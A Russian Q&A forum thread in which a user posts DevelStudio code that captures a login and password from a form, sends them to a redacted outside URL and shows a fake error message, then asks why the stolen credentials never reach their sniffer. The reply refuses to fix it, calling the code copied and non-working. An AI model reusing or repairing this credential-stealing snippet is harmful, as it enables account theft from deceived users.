Наталья Тормосина

Помогите с девил студию 2 0

Я все сделал правильно но почемуто Я использую этот код $edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit2')->text;
$combobox1 = c('Form1->combobox1')->inText;
$url = "[ссылка заблокирована по решению администрации проекта]";
file_get_contents($url . "?" . "login:" . $edit1 . "|pass:" . $edit2);
MessageBox("Невернно введёт логин или пароль", "Ошибка ввода"); но на сниффер не приходит логин и пароль, в чем может быть проблема?

Tohir

Здравствуйте.

> Я все сделал правильно.. .
Нет, все неправильно.

Самая большая ошибка -- это использование Devel Studio. Любой нормальный антивирус мгновенно реагирует на программы, созданные во второй версии. Сама среда разработки давно заброшена автором и после беты третьей версии обновлений не было. Не стоит использовать это для создания программ.

Вторая ошибка -- это бездумное копирование какого-то нерабочего кода из сомнительных источников. Кстати, этот код на "ответах" буква в букву встречался в вопросах уже больше сотни раз, и у всех он не работал.

Вы не умеете программировать, а следовательно, вам не под силу исправить возникшие ошибки.

Изучите языки программирования. Научитесь писать программы, а не копировать чужой код. Тогда подобных вопросов у вас возникать не будет.